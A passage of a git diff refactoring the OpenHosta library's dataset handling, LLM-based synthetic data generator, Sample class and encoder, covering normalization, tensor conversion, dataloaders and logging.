+ logger.log_custom("Data Generation", f"Generating {ammount} examples for function {func.__name__}")
+ data = LLMSyntheticDataGenerator.generate_synthetic_data(
+ func=_analyze_function(func),
+ logger=logger,
+ request_amounts=request_amounts,
+ examples_in_req=int(ammount / request_amounts),
+ model=oracle if oracle is not None else DefaultModel().get_default_model()
+ )
+ return HostaDataset.from_list(data, logger)
diff --git a/src/OpenHosta/exec/predict/dataset/dataset.py b/src/OpenHosta/exec/predict/dataset/dataset.py
index 38b2519..eb2db01 100644
--- a/src/OpenHosta/exec/predict/dataset/dataset.py
+++ b/src/OpenHosta/exec/predict/dataset/dataset.py
@@ -1,14 +1,18 @@
-import csv
-import json
-import os
-from enum import Enum
-from typing import List, Optional, Any, Dict
+from typing import Any, Dict, List, Optional, Tuple, Union, get_origin, get_args
+from typing_extensions import Literal
+import os
+import csv, json
import torch
+from torch.utils.data import DataLoader, TensorDataset, random_split
+
+from enum import Enum
from .sample_type import Sample
from ..encoder.simple_encoder import SimpleEncoder
-
+from ..predict_memory import File
+from ....core.hosta import Func
+from ....core.logger import Logger
class SourceType(Enum):
"""
@@ -17,127 +21,402 @@ class SourceType(Enum):
CSV = "csv"
JSONL = "jsonl"
JSON = "json"
+
class HostaDataset:
- def __init__(self, verbose: int = 1):
+ """
+ class for managing datasets in Hosta
+ """
+ def __init__(self, log: Logger):
self.path: Optional[str] = None # Path to the file
self.data: List[Sample] = [] # List of Sample objects
- self.dictionary: Dict[str, int] = {} # Dictionary for mapping str to id
+ self.dictionary: Dict[str, int] = {} # Dictionary for mapping str to id for encoding (for simple encoder -> Mini word2vec)
self.inference: Optional[Sample] = None # Inference data for understanding the data
- self.verbose: int = verbose # Verbose level for debugging
- self._encoder: Optional[SimpleEncoder] = None # Will store the encoder instance
+ self.log = log # Logger for logging the data
+ self.encoder: Optional[SimpleEncoder] = None # Encoder for encoding the data
- def add(self, sample: Sample):
+ ########################################################
+ ### Managing data ###
+ def add(self, data : Any, dataset : Optional[List[Sample]] = None) -> None:
"""
- Add a Sample object to the dataset.
+ Add data to the dataset
"""
- self.data.append(sample)
- def convert_data(self, batch_size: int, shuffle: bool, train_set_size: float = 0.8) -> tuple:
+ if dataset is None:
+ dataset = self.data
+
+ data_sampled = Sample(data)
+ dataset.append(data_sampled)
+ return None
+
+
+ ########################################################
+ ### Preparation of the data ###
+ def encode(self, max_tokens: int, dataset: Optional[List[Sample]] = None, inference_data: Optional[Sample] = None,
+ func : Func = None, dictionary_path : str = None ,inference : bool = False) -> List[Sample]:
"""
- Save the dataset to a file in the specified format and convert it into dataloader for training.
+ Encode data with a token limit for str values.
"""
- if not isinstance(self.data[0].input, torch.Tensor):
- self.tensorify()
-
- inputs = torch.stack([sample.input for sample in self.data])
- if all(sample.output is not None for sample in self.data):
- outputs = torch.stack([sample.output for sample in self.data])
- dataset = torch.utils.data.TensorDataset(inputs, outputs)
+ assert func is not None, "Func attribut must be provided for encoding"
+ mapping_dict: Optional[Dict[str, int]] = None
+
+
+ output_type = func.f_type[1]
+ if get_origin(output_type) is Literal:
+ mapping_dict = self._generate_mapping_dict(output_type)
+ # print("Mapping dict : ", mapping_dict)
+
+ self.get_dictionary(dictionary_path)
+ self.encoder = SimpleEncoder.init_encoder(max_tokens, self.dictionary, dictionary_path, mapping_dict, inference) #TODO: Future, we will can choose our own encoder
+
+ if inference:
+ inference_data = inference_data if inference_data is not None else self.inference
+ data_encoded = self.encoder.encode([inference_data])
+ self.inference = data_encoded[0]
else:
- dataset = torch.utils.data.TensorDataset(inputs)
-
- return self._create_dataloaders(dataset, batch_size, shuffle, train_set_size)
+ dataset = dataset if dataset is not None else self.data
+ data_encoded = self.encoder.encode(dataset)
+ self.data = data_encoded
- def save_data(self, file_path: str):
+ return data_encoded
+
+
+ def decode(self, predictions: Optional[Union[List[torch.Tensor], torch.Tensor]], func_f_type: Any) -> Tuple[Any, Any]:
"""
- Sauvegarde le dataset au format JSON
+ Decode the model predictions based on the function's return type.
"""
- data_to_save = {
- 'data': [
- {
- '_inputs': sample.input.tolist() if isinstance(sample.input, torch.Tensor) else sample.input,
- '_outputs': sample.output.tolist() if isinstance(sample.output, torch.Tensor) else sample.output
- }
- for sample in self.data
- ]
- }
- with open(file_path, 'w') as f:
- json.dump(data_to_save, f)
+ output_type = func_f_type[1]
+ output = self.encoder.decode(predictions, output_type)
+ return output, predictions
- def load_data(self, file_path: str):
- """
- Charge un dataset depuis un fichier JSON
+
+ def tensorize(self, value: Optional[Union[List[Sample], Sample]] = None, dtype: torch.dtype = None) -> List[Sample]:
"""
- with open(file_path, 'r') as f:
- data_dict = json.load(f)
+ Convert data to tensors for training.
- for sample_dict in data_dict['data']:
- self.add(Sample(sample_dict))
+ Args:
+ value: Optional data to tensorize (defaults to self.data)
+ dtype: Tensor dtype (defaults to torch.float32)
- def _create_dataloaders(self, dataset, batch_size: int, shuffle: bool, train_set_size: float):
- """
- Méthode utilitaire pour créer les dataloaders
+ Returns:
+ List of tensorized Samples
"""
- train_size = int(train_set_size * len(dataset))
-
- train_dataset = torch.utils.data.Subset(dataset, range(train_size))
- val_dataset = torch.utils.data.Subset(dataset, range(train_size, len(dataset)))
+ dtype = dtype if dtype is not None else torch.float32
+
+ if value is None:
+ value = self.data
+ elif isinstance(value, Sample):
+ value = [value]
+
+ for sample in value:
+ sample._inputs = torch.tensor(sample.input, dtype=dtype)
+
+ if sample.output is not None:
+ if isinstance(sample.output, (int, float)):
+ sample._outputs = torch.tensor(sample.output, dtype=dtype)
+ else:
+ sample._outputs = torch.tensor(sample.output, dtype=torch.long)
- return (
- torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=shuffle),
- torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False)
- )
+ if value[0].output is None:
+ self.inference = value[0] # TODO: fix the error here
+ else:
+ self.data = value
+ return value
- @staticmethod
- def from_data(data_path: str, batch_size: int, shuffle: bool, train_set_size: float = 0.8, verbose: int = 1) -> tuple:
+ def to_dataloaders(self, batch_size: int, data: Optional[List[Sample]] = None,
+ train_ratio: float = 0.8, shuffle: bool = True) -> Tuple[DataLoader, DataLoader]:
"""
- Load a dataset from a file and convert it into dataloader for training.
+ Process the data into DataLoader objects.
"""
- dataset = HostaDataset(verbose)
- dataset.load_data(data_path)
- return dataset.convert_data(batch_size, shuffle, train_set_size)
+ assert 0 < train_ratio < 1, "Train ratio must be between 0 and 1"
+ assert batch_size > 0, "Batch size must be greater than 0"
+ data = data if data is not None else self.data
- def save(self, path: str, source_type: SourceType = SourceType.CSV, elements: Optional[List[Sample]] = None):
+ # Tensorize if needed
+ if not isinstance(data[0]._inputs, torch.Tensor):
+ data = self.tensorize(data)
+
+ # Stack tensors
+ inputs = torch.stack([sample._inputs for sample in data])
+
+ if all(sample._outputs is not None for sample in data):
+ outputs = torch.stack([sample._outputs for sample in data])
+ else:
+ raise ValueError("Output data is missing in the dataset at least for one sample")
+
+ dataset = TensorDataset(inputs, outputs)
+
+ train_size = int(train_ratio * len(dataset))
+ val_size = len(dataset) - train_size
+ # print("Train size : ", train_size)
+ # print("Val size : ", val_size)
+ train_set, val_set = random_split(dataset, [train_size, val_size])
+
+ train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=shuffle)
+ val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=shuffle)
+ # print("Train loader len : ", len(train_loader))
+ # print("Val loader len : ", len(val_loader))
+ return train_loader, val_loader
+
+ def normalize_data(self, normalization_file: File, data: Optional[Union[List[Sample], Sample]] = None) -> List[Sample]:
"""
- Save the dataset or specific elements to a file in the specified format.
- Converts Sample objects back to dictionaries for storage.
+ Normalize the input and output data column-wise to the range [-1, 1].
Args:
- path: Path where to save the file
- source_type: Type of file format to save (CSV, JSONL, or PICKLE)
- elements: Optional list of Sample objects to save. If None, saves entire dataset
- """
- self.path = path
- data_to_save = elements if elements is not None else self.data
-
- # Convert Samples to dictionaries for saving
- dict_data = []
- for sample in data_to_save:
- sample_dict = {}
- for i, input_value in enumerate(sample.input):
- sample_dict[f'input_{i}'] = input_value
+ normalization_file (File): Path to the file where the normalization stats will be saved.
+ data (Optional[Union[List[Sample], Sample]]): Data to normalize. If None, normalizes self.data.
+
+ Returns:
+ List[Sample]: Normalized samples.
+ """
+ if data is None:
+ data = self.data
+ elif isinstance(data, Sample):
+ data = [data]
+
+ if len(data) == 0:
+ raise ValueError("No data to normalize.")
+
+ num_columns = len(data[0].input)
+ min_values = [float('inf')] * num_columns
+ max_values = [float('-inf')] * num_columns
+
+ min_output = float('inf')
+ max_output = float('-inf')
+
+ for sample in data:
+ for col_idx, value in enumerate(sample.input):
+ if value < min_values[col_idx]:
+ min_values[col_idx] = value
+ if value > max_values[col_idx]:
+ max_values[col_idx] = value
if sample.output is not None:
- sample_dict['_outputs'] = sample.output
- dict_data.append(sample_dict)
+ if sample.output < min_output:
+ min_output = sample.output
+ if sample.output > max_output:
+ max_output = sample.output
+
+ normalization_data = {
+ 'inputs': {'min': min_values, 'max': max_values},
+ 'output': {'min': min_output, 'max': max_output}
+ }
- if source_type == SourceType.CSV:
- with open(path, 'w', newline='', encoding='utf-8') as f:
- if not dict_data:
- return
- writer = csv.DictWriter(f, fieldnames=dict_data[0].keys())
- writer.writeheader()
- writer.writerows(dict_data)
+ for sample in data:
+ for col_idx, value in enumerate(sample.input):
+ if max_values[col_idx] == min_values[col_idx]:
+ sample.input[col_idx] = 0
+ else:
+ sample.input[col_idx] = 2 * (value - min_values[col_idx]) / (max_values[col_idx] - min_values[col_idx]) - 1
+ if sample.output is not None:
+ if max_output == min_output:
+ sample.output = 0
+ else:
+ sample.output = 2 * (sample.output - min_output) / (max_output - min_output) - 1
- elif source_type == SourceType.JSONL:
- with open(path, 'w', encoding='utf-8') as f:
- for row in dict_data:
- json.dump(row, f)
- f.write('\n')
+ with open(normalization_file.path, 'w', encoding='utf-8') as f:
+ json.dump(normalization_data, f, indent=2, sort_keys=True) # type: ignore
+
+ self.data = data
+ return self.data
+
+ def normalize_input_inference(self, normalization_file: File):
+ """
+ Normalize the input data column-wise to the range [-1, 1].
+
+ Args:
+ normalization_file (File): Path to the file where the normalization stats are stored.
+
+ Returns:
+ Sample: Normalized input sample.
+ """
+ if self.inference is None:
+ raise ValueError("No data to normalize.")
+
+ with open(normalization_file.path, 'r', encoding='utf-8') as f:
+ normalization_data = json.load(f)
+
+ input_min = normalization_data['inputs']['min']
+ input_max = normalization_data['inputs']['max']
+
+ for col_idx, value in enumerate(self.inference.input):
+ if input_max[col_idx] != input_min[col_idx]:
+ self.inference.input[col_idx] = 2 * (value - input_min[col_idx]) / (input_max[col_idx] - input_min[col_idx]) - 1
+ else:
+ self.inference.input[col_idx] = 0
+
+ return self.inference
+
+
+ def denormalize_output_inference(self, output: float, normalization_file: File):
+ """
+ Denormalize the output data using the normalization stats stored in the given file.
+ The file must contain the min and max for the output.
+
+ Args:
+ output (float): Output data to denormalize.
+ normalization_file (File): Path to the normalization metadata file.
+
+ Returns:
+ float: Denormalized output.
+ """
+ with open(normalization_file.path, 'r', encoding='utf-8') as f:
+ normalization_data = json.load(f)
+ output_min = normalization_data['output']['min']
+ output_max = normalization_data['output']['max']
+
+ if output_max != output_min:
+ output = ((output + 1) / 2) * (output_max - output_min) + output_min
else:
- raise ValueError(f"Unsupported source type: {source_type}")
+ output = output_min
+
+ return output
+
+ @staticmethod
+ def denormalize_output(output: Sample, normalization_file: File):
+ """
+ Denormalize the output data using the normalization stats stored in the given file.
+ The file must contain the min and max for the output.
+
+ Args:
+ output (Sample): Output data to denormalize.
+ normalization_file (File): Path to the normalization metadata file.
+
+ Returns:
+ Sample: Denormalized output sample.
+ """
+ with open(normalization_file.path, 'r', encoding='utf-8') as f:
+ normalization_data = json.load(f)
+ output_min = normalization_data['output']['min']
+ output_max = normalization_data['output']['max']
+
+ if output_max != output_min:
+ output.output = ((output.output + 1) / 2) * (output_max - output_min) + output_min
+ else:
+ output.output = output_min
+
+ return output
+
+ def manage_example(self):
+ pass
+
+ def examples_to_eval(self):
+ pass
+
+
+ ########################################################
+ ### Internal function process ###
+ @staticmethod
+ def _generate_mapping_dict(literal) -> dict[str, int]:
+ """
+ Generate a mapping dictionary for the output type.
+ Parameters:
+ out: A Literal type containing the possible values
+ Returns:
+ dict: A dictionary mapping each value to a unique integer (starting from 0)
+ """
+ if get_origin(literal) is not Literal:
+ raise ValueError("The literal arg must be a Literal type")
+
+ unique_values = list(get_args(literal))
+ mapping_dict = {value: idx for idx, value in enumerate(unique_values)}
+ return mapping_dict
+
+ def get_dictionary (self, dictionary_path: str) -> None:
+ """
+ Load the tokenizer dictionary from a file
+ """
+ if not os.path.exists(dictionary_path):
+ self.dictionary = {}
+ else:
+ with open(dictionary_path, 'r', encoding='utf-8') as f:
+ loaded_dict = json.load(f)
+ self.dictionary = loaded_dict if loaded_dict else {}
+
+ def save_dictionary(self, dictionary_path: str) -> None:
+ """
+ Save the tokenizer dictionary of mapping to a file
+ """
+ # Create directory if it doesn't exist
+ os.makedirs(os.path.dirname(dictionary_path), exist_ok=True)
+
+ with open(dictionary_path, 'w', encoding='utf-8') as f:
+ json.dump(self.dictionary, f, indent=2, sort_keys=True) # type: ignore
+
+ def prepare_inference(self, inference_data: dict, max_tokens :int, func : Func, dictionary_path :str) -> None:
+ """
+ Prepare the inference data for the model.
+ """
+ self.inference = Sample(inference_data)
+ self.encode(max_tokens=max_tokens, inference_data=self.inference, func=func, dictionary_path=dictionary_path, inference=True)
+ self.tensorize(self.inference)
+
+ def save(self, path: str, source_type: SourceType = SourceType.CSV, elements: Optional[List[Sample]] = None):
+ """
+ Save the dataset or specific elements to a file in the specified format.
+ Converts Sample objects back to dictionaries for storage.
+
+ Args:
+ path: Path where to save the file
+ source_type: Type of file format to save (CSV, JSONL, or PICKLE)
+ elements: Optional list of Sample objects to save. If None, saves entire dataset
+ """
+ self.path = path
+ data_to_save = elements if elements is not None else self.data
+
+ # Convert Samples to dictionaries for saving
+ dict_data = []
+ for sample in data_to_save:
+ sample_dict = {}
+ for i, input_value in enumerate(sample.input):
+ sample_dict[f'input_{i}'] = input_value
+ if sample.output is not None:
+ sample_dict['outputs'] = sample.output
+ dict_data.append(sample_dict)
+
+ if source_type == SourceType.CSV:
+ with open(path, 'w', newline='', encoding='utf-8') as f:
+ if not dict_data:
+ return
+ writer = csv.DictWriter(f, fieldnames=dict_data[0].keys()) # type: ignore
+ writer.writeheader()
+ writer.writerows(dict_data)
+
+ elif source_type == SourceType.JSONL:
+ with open(path, 'w', encoding='utf-8') as f:
+ for row in dict_data:
+ json.dump(row, f) # type: ignore
+ f.write('\n')
+
+ else:
+ raise ValueError(f"Unsupported source type: {source_type}")
+
+ def save_data(self, file_path: str):
+ """
+ Sauvegarde le dataset au format JSON
+ """
+ data_to_save = {
+ 'data': [
+ {
+ 'inputs': sample.input.tolist() if isinstance(sample.input, torch.Tensor) else sample.input,
+ 'outputs': sample.output.tolist() if isinstance(sample.output, torch.Tensor) else sample.output
+ }
+ for sample in self.data
+ ]
+ }
+ with open(file_path, 'w', encoding='utf-8') as f:
+ json.dump(data_to_save, f) # type: ignore
+
+ def load_data(self, file_path: str):
+ with open(file_path, 'r', encoding='utf-8') as f:
+ data_dict = json.load(f)
+
+ for sample_dict in data_dict['data']:
+ self.add(sample_dict)
+
+ ########################################################
+ ### Conversion ##
def convert_files(self, path: str, source_type: Optional[SourceType] = None) -> List[Sample]:
"""
Load dataset from a file and convert each row to a Sample object.
@@ -158,14 +437,15 @@ def convert_files(self, path: str, source_type: Optional[SourceType] = None) ->
source_type = SourceType.CSV
elif path.endswith('.jsonl'):
source_type = SourceType.JSONL
+ elif path.endswith('.json'):
+ source_type = SourceType.JSON
else:
raise ValueError(f"Please specify the source type for the file: {path}")
if source_type == SourceType.CSV:
- with open(path, 'r') as f:
+ with open(path, 'r', encoding='utf-8') as f:
reader = csv.DictReader(f)
for row in reader:
- # Convert string numbers to float if possible
processed_row = {}
for key, value in row.items():
try:
@@ -175,163 +455,127 @@ def convert_files(self, path: str, source_type: Optional[SourceType] = None) ->
self.data.append(Sample(processed_row))
elif source_type == SourceType.JSONL:
- with open(path, 'r') as f:
+ with open(path, 'r', encoding='utf-8') as f:
for line in f:
record = json.loads(line)
if not isinstance(record, dict):
record = {'input_0': record}
self.data.append(Sample(record))
+ elif source_type == SourceType.JSON:
+ with open(path, 'r', encoding='utf-8') as f:
+ data = json.load(f)
+ if isinstance(data, dict):
+ self.convert_dict(data)
+ elif isinstance(data, list):
+ self.convert_list(data)
+ else:
+ raise ValueError(f"Unsupported data format in JSON file: {path}")
+
else:
raise ValueError(f"Unsupported source type: {source_type}")
return self.data
- def convert_list(self, data: list) -> List[Sample]:
- """
- Create a dataset from a list.
-
- Args:
- data: List of dictionaries or tuples/lists representing Sample _inputs and _outputs.
- Each item should either be:
- - a dict with keys for _inputs (e.g., 'input_0', 'input_1', ...) and optional '_outputs', or
- - a tuple/list where the first part is _inputs(s) and the last item is _outputs (optional).
- Returns:
- HostaDataset instance
+ def convert_list(self, data: list = None) -> List[Sample]:
"""
-
+ Convert a dataset from a list.
+ """
+ data = data if data is not None else self.data
+ output_data = []
for entry in data:
if isinstance(entry, dict):
# If the entry is already a dictionary, let's assume it has the keys in the right structure
- self.add(Sample(entry))
+ output_data.append(Sample(entry))
elif isinstance(entry, (list, tuple)):
- # If it's a list or tuple, we assume it's structured as (_inputs..., [_outputs])
- inputs = list(entry[:-1]) # All but last element are _inputs
- output = entry[-1] if len(entry) > 1 else None # Last element could be _outputs if present
+ # If it's a list or tuple, we assume it's structured as (inputs..., [outputs])
+ inputs = list(entry[:-1]) # All but last element are inputs
+ output = entry[-1] if len(entry) > 1 else None # Last element could be outputs if present
sample_dict = {f'input_{i}': input_value for i, input_value in enumerate(inputs)}
if output is not None:
- sample_dict['_outputs'] = output
- self.add(Sample(sample_dict))
+ sample_dict['outputs'] = output
+ output_data.append(Sample(sample_dict))
else:
raise ValueError(f"Unsupported data format in list entry: {entry}")
- def encode(self, max_tokens: int) -> None:
- """
- Encode le dataset d'entraînement et crée le dictionnaire
- """
- if self._encoder is None:
- self._encoder = SimpleEncoder()
- self.data = self._encoder.encode(self.data, max_tokens=max_tokens)
- self.dictionary = self._encoder.dictionary
-
- def encode_inference(self) -> None:
- """
- Encode les données d'inférence avec le dictionnaire existant
- """
- if self.dictionary is None:
- raise ValueError("No dictionary available. Call encode() first on training data")
-
- self._encoder = SimpleEncoder(existing_dict=self.dictionary)
- self.inference = self._encoder.encode([self.inference], max_tokens=10)[0]
+ self.data = output_data
+ return self.data
- def tensorify(self, dtype=None) -> None:
- """
- Convertit le dataset d'entraînement en tenseurs
- """
- if dtype is None:
- dtype = torch.float32
-
- for sample in self.data:
- if not isinstance(sample.input, torch.Tensor):
- sample._inputs = torch.tensor(sample.input, dtype=dtype)
-
- if sample.output is not None and not isinstance(sample.output, torch.Tensor):
- if isinstance(sample.output, (int, float)):
- sample._outputs = torch.tensor(sample.output, dtype=dtype)
- else:
- sample._outputs = torch.tensor(sample.output, dtype=dtype)
- def tensorify_inference(self, dtype=None) -> None:
+ def convert_dict(self, data: dict) -> List[Sample]:
"""
- Convertit les données d'inférence en tenseurs
+ Convert a dataset from a dict.
"""
- if dtype is None:
- dtype = torch.float32
-
- if not isinstance(self.inference.input, torch.Tensor):
- self.inference._inputs = torch.tensor(self.inference.input, dtype=dtype)
+ data = data if data is not None else self.data
+ output_data = []
+ for key, value in data.items():
+ if not isinstance(value, dict):
+ value = {'outputs': value}
+ value['outputs'] = value.pop(key, None)
+ output_data.append(Sample(value))
+ self.data = output_data
+ return self.data
- def prepare_inference(self, inference_data: dict) -> None:
- """
- Prépare les données d'inférence en les encodant et les convertissant en tenseurs
- """
- self.inference = Sample(inference_data)
- self.encode_inference()
- self.tensorify_inference()
+ ########################################################
+ ### Class Generator ###
@staticmethod
- def from_input(inference_data: dict, verbose: int = 0) -> 'HostaDataset':
+ def from_files(path: str, source_type: Optional[SourceType], log: Logger) -> 'HostaDataset':
"""
- Crée un dataset à partir de données d'inférence
+ Load a dataset from a file.
"""
- dataset = HostaDataset(verbose)
- dataset.prepare_inference(inference_data)
+ dataset = HostaDataset(log)
+ dataset.convert_files(path, source_type)
return dataset
-
- def decode(self, predictions: List[Any], func_f_type: Any) -> List[Any]:
+
+ @staticmethod
+ def from_list(data: list, logger: Logger) -> 'HostaDataset':
"""
- Decode the model predictions based on the function's return type.
+ Create a dataset from a list.
"""
- if self._encoder is None:
- raise ValueError("Dataset must be encoded before decoding")
-
- # Check if func_f_type is a typing.Literal
- # if isinstance(func_f_type, typing._GenericAlias) and get_origin() is Literal:
-
- # if get_origin(func_f_type) is Literal:
- # Return decoded predictions using the encoder
- # return [self._encoder.decode_prediction(pred) for pred in predictions]
- # else:
- decoded_predictions = []
- for pred in predictions:
- pred_value = pred.detach().cpu().numpy()
- # Convert pred_value to the expected type
- # Handle scalar and array predictions
- if pred_value.size == 1:
- pred_scalar = pred_value.item()
- else:
- pred_scalar = pred_value
- try:
- converted_pred = func_f_type(pred_scalar)
- except (TypeError, ValueError):
- converted_pred = pred_scalar # Return as is if conversion fails
- decoded_predictions.append(converted_pred)
- if func_f_type != list:
- decoded_predictions = decoded_predictions[0]
- return decoded_predictions
-
+ dataset = HostaDataset(logger)
+ dataset.convert_list(data)
+ return dataset
+
@staticmethod
- def from_files(path: str, source_type: Optional[SourceType], verbose: int = 1) -> 'HostaDataset':
+ def from_input(inference_data: dict, logger: Logger, max_tokens : int, func: Func, dictionary_path : str) -> 'HostaDataset':
"""
- Load a dataset from a file.
+ Crée un dataset à partir de données d'inférence
"""
- dataset = HostaDataset(verbose)
- dataset.convert_files(path, source_type)
+ dataset = HostaDataset(logger)
+ dataset.prepare_inference(inference_data, max_tokens, func, dictionary_path)
return dataset
-
+
@staticmethod
- def from_list(data: list, verbose: int) -> 'HostaDataset':
+ def from_data(data_path: str, logger: Logger,) -> 'HostaDataset':
"""
- Create a dataset from a list.
+ Load a dataset from a file and convert it into dataloader for training.
"""
- dataset = HostaDataset(verbose)
- dataset.convert_list(data)
+ dataset = HostaDataset(logger)
+ dataset.load_data(data_path)
+
return dataset
+ # if config.batch_size is None:
+ # config.batch_size = max(1, min(16384, int(0.05 * len(dataset.data))))
+ # return dataset.to_dataloaders(batch_size=config.batch_size, shuffle=shuffle, train_ratio=train_ratio)
- @staticmethod
def __len__(self):
return len(self.data)
def __iter__(self):
return iter(self.data)
+
+
+
+
+
+if __name__ == "__main__":
+ logger = Logger()
+ dataset = HostaDataset(logger)
+
+ dataset.convert_files("data.csv", SourceType.CSV)
+
+ dataset.encode(...)
+ dataset.tensorize()
+ train, val = dataset.to_dataloaders(32)
diff --git a/src/OpenHosta/exec/predict/dataset/oracle.py b/src/OpenHosta/exec/predict/dataset/oracle.py
index abccebd..5afaad5 100644
--- a/src/OpenHosta/exec/predict/dataset/oracle.py
+++ b/src/OpenHosta/exec/predict/dataset/oracle.py
@@ -1,6 +1,7 @@
import inspect
-from typing import Optional, Dict, Any, List, Type, Union, get_args, Literal
+from typing import Optional, Dict, Any, List, Type, Union, Literal, get_args, get_origin
+from ....core.logger import Logger
from ....core.config import Model, DefaultManager
from ....core.hosta import Func
@@ -13,7 +14,8 @@ class LLMSyntheticDataGenerator:
@staticmethod
- def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[str, float]]]:
+ def _validate_row(row: str, expected_fields: List[Type], logger: Logger) -> Optional[List[Union[str, float]]]:
+ logger.log_custom("Data Generation", f"Validating row: {row}", one_line=False)
try:
values = row.strip().split(',')
@@ -40,14 +42,14 @@ def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[
else:
return None
- elif getattr(expected_type, '__origin__', None) is Literal:
+ elif get_origin(expected_type) is Literal:
valid_literals = get_args(expected_type)
- if value in valid_literals:
- result.append(value)
+ if value.strip('"') in valid_literals:
+ result.append(value.strip('"'))
else:
- return None # Invalid Literal
+ return None
- elif getattr(expected_type, '__origin__', None) is Union and type(None) in get_args(expected_type):
+ elif get_origin(expected_type) is Union and type(None) in get_args(expected_type):
non_none_types = [t for t in get_args(expected_type) if t is not type(None)]
for t in non_none_types:
if t == int:
@@ -76,7 +78,7 @@ def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[
@staticmethod
def _format_example(input_val: Any, output_val: Any) -> str:
"""
- Format a single example based on _inputs/_outputs types.
+ Format a single example based on inputs/outputs types.
"""
if isinstance(input_val, (list, tuple)):
input_str = ','.join(map(str, input_val))
@@ -104,15 +106,17 @@ def _build_user_prompt(
for input_val, output_val in examples.items():
user_prompt += f"{LLMSyntheticDataGenerator._format_example(input_val, output_val)}\n"
- user_prompt += f"\n\nGenerate {examples_in_req} new DIVERSE _inputs-_outputs pairs, one per line, in CSV format"
+ user_prompt += f"\n\nGenerate {examples_in_req} new DIVERSE inputs-outputs pairs, one per line, in CSV format"
if output_type == str:
- user_prompt += " (remember to enclose string _outputs in quotes ex: \"_outputs\")"
+ user_prompt += " (remember to enclose string outputs in quotes ex: \"outputs\")"
user_prompt += ":\n"
- user_prompt += f"{','.join(func.f_sig.parameters.keys())},_outputs"
- user_prompt += f"\n{','.join([str(f"\n- {a} is type {b.annotation.__name__ if b.annotation != inspect.Parameter.empty else 'Any'}")\
- for a, b in func.f_sig.parameters.items()])}\n"
- user_prompt += f"- _outputs is type {output_type.__name__}\n"
+ user_prompt += f"{','.join(func.f_sig.parameters.keys())},outputs"
+ user_prompt += "\n" + "\n".join([
+ f"- {a} is type {b.annotation.__name__ if b.annotation != inspect.Parameter.empty else 'Any'}"
+ for a, b in func.f_sig.parameters.items()
+ ]) + "\n"
+ user_prompt += f"- outputs is type {output_type.__name__}\n"
return user_prompt
@@ -120,6 +124,7 @@ def _build_user_prompt(
@staticmethod
def generate_synthetic_data(
func: Func, # The function to generate data for
+ logger: Logger, # Logger to use for logging
request_amounts: int = 3, # Amount of requests to the model
examples_in_req: int = 50, # Examples amount in each request
model: Optional[Model] = None # Model to use for data generation
@@ -134,7 +139,7 @@ def generate_synthetic_data(
to_append = {}
for i, key in enumerate(input_types.keys()):
to_append[key] = ex_inputes[i]
- to_append["_outputs"] = ex_output
+ to_append["outputs"] = ex_output
if not model:
model = DefaultManager.get_default_model()
@@ -160,7 +165,6 @@ def generate_synthetic_data(
result: List[Dict] = []
conversation_history: List = []
attempts = 0
- expected_fields = len(input_types) + 1
conversation_history.append({
"role": "system",
@@ -199,11 +203,11 @@ def generate_synthetic_data(
rows = response["choices"][0]["message"]["content"].strip().split('\n')
for row in rows:
- cleaned_row = LLMSyntheticDataGenerator._validate_row(row, list(input_types.values()) + [output_type])
+ cleaned_row = LLMSyntheticDataGenerator._validate_row(row, list(input_types.values()) + [output_type], logger)
if cleaned_row:
if cleaned_row not in generated_data:
dictrow = dict(zip(input_types.keys(), cleaned_row[:-1]))
- dictrow["_outputs"] = cleaned_row[-1]
+ dictrow["outputs"] = cleaned_row[-1]
result.append(dictrow)
generated_data.append(cleaned_row)
@@ -213,7 +217,7 @@ def generate_synthetic_data(
conversation_history = [conversation_history[0]] + conversation_history[-9:]
except Exception as e:
- print(f"Error during generation: {e} line {e.__traceback__.tb_lineno}")
+ logger.log_custom("Data Generation", f"Error during generation: {e} line {e.__traceback__.tb_lineno}")
attempts += 1
diff --git a/src/OpenHosta/exec/predict/dataset/sample_type.py b/src/OpenHosta/exec/predict/dataset/sample_type.py
index 67277db..078dc4a 100644
--- a/src/OpenHosta/exec/predict/dataset/sample_type.py
+++ b/src/OpenHosta/exec/predict/dataset/sample_type.py
@@ -6,15 +6,14 @@
class Sample:
"""
A class to handle data samples for machine learning.
- Expects a dictionary where all keys except '_outputs' are considered as _inputs.
+ Expects a dictionary where all keys except "outputs' are considered as _inputs.
Example:
data = {
- 'feature1': [1, 2], # Any key except '_outputs' is considered _inputs
+ 'feature1': [1, 2], # Any key except 'outputs' is considered _inputs
'feature2': {'a': 3}, # Can contain any nested structure
'feature3': 4, # Can contain any primitive type
- 'feature4': BaseModel(), # Can contain Pydantic models
- '_outputs': 9 # Optional _outputs
+ 'outputs': 9 # Optional outputs
}
sample = Sample(data)
"""
@@ -26,7 +25,7 @@ def __init__(self, data: dict):
self._inputs: List[Any] = []
self._outputs: Optional[Any] = None
- output_data = data.pop('_outputs', None)
+ output_data = data.pop('outputs', None)
if output_data is not None:
output_flattened = self._flatten_data(output_data)
self._outputs = output_flattened[0] if len(output_flattened) == 1 else output_flattened
@@ -58,10 +57,22 @@ def input(self) -> List[Any]:
"""Get the _inputs features"""
return self._inputs
+ @input.setter
+ def input(self, value: List[Any]) -> None:
+ """Set the input features."""
+ if not isinstance(value, list):
+ raise ValueError("The 'input' property must be a list.")
+ self._inputs = value
+
@property
def output(self) -> Optional[Any]:
"""Get the _outputs label (None if no _outputs was provided)"""
return self._outputs
+ @output.setter
+ def output(self, value: Optional[Any]) -> None:
+ """Set the output label."""
+ self._outputs = value
+
def __repr__(self) -> str:
return f"Sample(_inputs={self.input}, _outputs={self.output})"
diff --git a/src/OpenHosta/exec/predict/encoder/simple_encoder.py b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
index a738320..a9d91ce 100644
--- a/src/OpenHosta/exec/predict/encoder/simple_encoder.py
+++ b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
@@ -1,17 +1,37 @@
-from typing import List, Any, Dict, Union
+from typing import List, Any, Dict, Union, Optional
+
+import torch
+import json
+import re
from .base_encoder import BaseEncoder
from ..dataset.sample_type import Sample
-class NumericEncoder(BaseEncoder):
- def encode(self, value: Union[int, float]) -> float:
+class IntegerEncoder(BaseEncoder):
